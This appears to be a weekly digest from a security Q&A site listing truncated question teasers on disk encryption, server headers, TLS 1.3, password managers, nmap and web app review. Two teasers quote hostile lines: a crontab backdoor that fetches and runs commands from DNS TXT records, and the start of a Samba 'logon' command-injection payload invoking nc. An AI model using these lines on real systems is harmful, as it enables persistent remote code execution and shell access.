Top new questions this week:
|
|
I have a 4TB mechanical hard drive that was encrypted before I ever wrote any file on it. I used a 25 character password with symbols. Before I sold it, I unmounted the disk while it was still …
|
|
How serious a security problem is it to have the name of the web server in the HTTP header (Apache, Nginx etc.)? I am discussing this with a system administrator and he told me that deleting version …
|
|
I use an old AirPort Extreme to provide WiFi in my home. It provides a 2.4 and 5.0 GHz network with a good password, only available to me and my wife. It also provides a separate guest network without …
|
|
My question has to do with “stateless” Hello Retry Requests between a Client and Server doing a TLS 1.3 Handshake. First, some context: Relevent portion of the TLS 1.3 RFC: www.rfc-…
|
|
I am a big fan of 1Password. And I try to save my passwords in 1Password as much as possible. However, there are environments where 1Password cannot be used. That is the password to protect 1Password …
|
|
I found this backdoor in a crontab: * * * * * /bin/sh -c “sh -c $(dig imf0rce.htb TXT +short @ns.imf0rce.htb)” And if i understood correctly, it queries all the TXT records in the domain …
|
|
I’m getting familiar with Firebase and the firestore database. I have a small project relying on a certain data format. It is a simple React project with direct connexion to its firestore, so no back-…
|
Greatest hits from previous weeks:
|
|
Chinese police are forcing whole cities to install an Android spyware app Jingwang Weishi. They are stopping people in the street and detaining those who refuse to install it. Knowing that I may be …
|
|
I have found out recently that the remote assistant software that we put in a smartphone we sell can be activated by us without user approval. We are not using this option, and it is probably there …
|
|
On passwordsgenerator.net/, it says Examples of weak passwords: qwert12345, Gbt3fC79ZmMEFUFJ, 1234567890, 987654321, nortonpassword The first, third, and fourth examples are obviously weak….
|
|
Is it there any difference between the encrypted Google search (at encrypted.google.com) and the ordinary HTTPS Google search (at google.com)? In terms of security what were the …
|
|
I am trying to find the live hosts on my network using nmap. I am scanning the network in Ubuntu using the command sudo nmap -sP 192.168.2.1/24. However, I am unable to find the live hosts. I just get …
|
|
Where I work I’m forced to change my password every 90 days. This security measure has been in place in many organizations for as long as I can remember. Is there a specific security vulnerability …
|
|
I’ve been playing around with different login forms online lately to see how they work. One of them was the Facebook login form. When I logged out of my account my email and password were …
|
Can you answer these questions?
|
|
(This question is based on a comment I made on How Vault agent solves Secret Zero challenge in Kubernetes?) We are planning to run some of our software in a Kubernetes cluster running on bare metal (i….
|
|
I am getting an error that says “Current VUID is 0” no matter what I put in as a command. The command I’m attempting (with my listener properly configured) is: smb: \> logon “/=`nc …
|
|
I am currently reviewing an ASP application where this javascript initialization is used all over the place: const someValue = “<% get_some_value() %>”; And this pattern is actually …
|
